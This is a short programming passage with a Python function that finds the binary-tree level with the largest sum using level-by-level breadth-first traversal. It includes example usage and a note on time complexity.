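If both the level and its sum are wanted, the null-marker bookkeeping can also be replaced by processing one level per iteration of the outer loop, using the queue's current length to delimit the level. This is a sketch, not the article's original approach; the function name max_level_and_sum and the size-based level grouping are illustrative choices:

```python
from collections import deque

class Node:
    def __init__(self, data):
        self.left = None
        self.data = data
        self.right = None

def max_level_and_sum(root):
    """Return (max_level, max_sum), or None for an empty tree."""
    if root is None:
        return None
    q = deque([root])
    best_level, best_sum, level = 0, float("-inf"), 0
    while q:
        # All nodes currently in the queue belong to the same level
        current_sum = 0
        for _ in range(len(q)):
            node = q.popleft()
            current_sum += node.data
            if node.left:
                q.append(node.left)
            if node.right:
                q.append(node.right)
        if current_sum > best_sum:
            best_level, best_sum = level, current_sum
        level += 1
    return best_level, best_sum

root = Node(1)
root.left, root.right = Node(2), Node(3)
root.left.left, root.left.right = Node(4), Node(5)
root.right.left, root.right.right = Node(6), Node(7)
print(max_level_and_sum(root))  # (2, 22)
```

The time complexity is still O(n), and initializing best_sum to -infinity keeps the result correct when every level sum is negative.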